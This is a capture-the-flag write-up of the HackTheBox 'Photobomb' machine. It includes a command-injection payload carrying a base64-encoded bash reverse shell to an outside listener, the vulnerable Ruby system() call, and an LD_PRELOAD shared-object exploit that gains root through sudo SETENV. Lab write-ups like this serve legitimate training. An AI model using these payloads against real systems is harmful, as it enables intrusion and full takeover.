Contents

🕵️ HTB-Writeup : PHOTOBOMB

Introduction

Welcome to our new HackTheBox write-up! In this article, we will guide you through the steps we took to successfully compromise the targeted machine.

Photobomb is an Easy Linux machine.

Recon

nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
└─$ rustscan -a 10.10.11.182 -b 2500 -- -T4 -Pn -sV -A

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We face that seems to be a Linux server that host a webserver.

dirbuster

Using dirbuster, we find some files & directories.

drawing

Some page like http://photobomb.htb/printer ask for credentials.

Source-code

We find some credentials while checking the photobomb.js source code.

1
2
3
    [...]
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }

Trying pH0t0:b0Mb!, we can now have an complete access to the page.

We are now facing a page with some pictures. We can download those as PNG or JPG.

When browsing to an non-existing page, we found an error message.

drawing

Maybe the webserver use the Sinatra framework.

Looking for any know vulnerabilities

exiftool

I first checked exif of image that we can download from the website.

1
2
3
4
└─$ exiftool ../Downloads/kevin-charit-XZoaTJTnB9U-unsplash_3000x2000.png
[...]
Profile Creator                 : Little CMS
[...]

We found that image’s Profile Creator is Little CMS, checking with searchsploit

searchsploit

1
2
3
4
5
6
7
└─$ searchsploit little cms
----------------------------------------------------- ---------------------------------
 Exploit Title                                       |  Path
----------------------------------------------------- ---------------------------------
CMS little 0.0.1 - 'template' Local File Inclusion   | php/webapps/5992.txt
CMS little 0.0.1 - 'term' SQL Injection              | php/webapps/7269.pl
----------------------------------------------------- ---------------------------------

We found that there is some SQLi for that profile but here it does not work.

Try LFI from this article. But does not work.

Vulnerability on Sinatra Framework

Intercepting download requests using Burp we find that 3 parameters are used: photo & filetype & dimensions

Those parameters are used to craft code at server side. It means that we are probably able to execute code (RCE) using those parameters.

I first tried to inject a reverse shell on the photo parameter.

1
2
3
4
5
6
7
8
POST /printer HTTP/1.1
Host: photobomb.htb
Content-Length: 74
Cache-Control: max-age=0
Authorization: Basic cEgwdDA6YjBNYiE=
[...]

photo=voicu-apostol-MWER49YaD-M-unsdplash.jpg; nc 10.10.16.11 4444 &filetype=jpg&dimensions=30x20

But it does not work. Then, I tried to base64 encode the same payload and inject it on the same parameter.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
# encode payload
echo '/bin/bash -i >& /dev/tcp/10.10.16.11/4444 0>&1' |base64
# L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjExLzQ0NDQgMD4mMQ==

POST /printer HTTP/1.1
Host: photobomb.htb
Content-Length: 74
Cache-Control: max-age=0
Authorization: Basic cEgwdDA6YjBNYiE=
[...]

photo=voicu-apostol-MWER49YaD-M-unsdplash.jpg; echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjExLzQ0NDQgMD4mMQ=='|base64 -d|bash &filetype=jpg&dimensions=30x20

Opening a listener on my machine and…

1
2
3
4
5
6
└─$ rlwrap nc -lvnp 4444 
wizard@photobomb:~/photobomb$ whoami
wizard

cat ~/user.txt
*************************************

It works! We are now wizard on the machine. We can get the user flag :)

Explaining vulnerable code

Here the code that I get from the machine.

1
2
3
4
5
6
7
  if !File.exists?('resized_images/' + filename)
    command = 'convert source_images/' + photo + ' -resize ' + dimensions + ' resized_images/' + filename
    puts "Executing: #{command}"
    system(command)
  else
    puts "File already exists."
  end

Here we can easily see that we can add command as parameters are directly added to the command variable. Parameters are not checked/filtered.

Path to the privesc

I first checked sudo permissions for the user wizard.

1
2
3
4
5
6
7
wizard@photobomb:~/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

The user can execute a script as root without providing a password. Checking the script.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
wizard@photobomb:~/photobomb$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

find command is used without a full path. This is exploitable. Find this interesting article that is using the LD_PRELOAD environment variable to privesc. Hacktrick also have the exploit.

LD_PRELOAD is an environment variable that list shared libraries with functions that override the standard set, just as /etc/ld.so.preload does. These are implemented by the loader /lib/ld-linux.so

Exploiting LD_PRELOAD

Using the code from Hacktricks.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Then, compiled it and adding the env variable to our command.

1
2
3
4
5
6
7
8
# compile it with this command then send it to the machine
gcc -fPIC -shared -o pe.so pe.c -nostartfiles

wizard@photobomb:~/photobomb$ sudo LD_PRELOAD=/tmp/pe.so /opt/cleanup.sh
# whoami
root
# cat /root/root.txt
***************************d9975

It works! We can get the root flag :)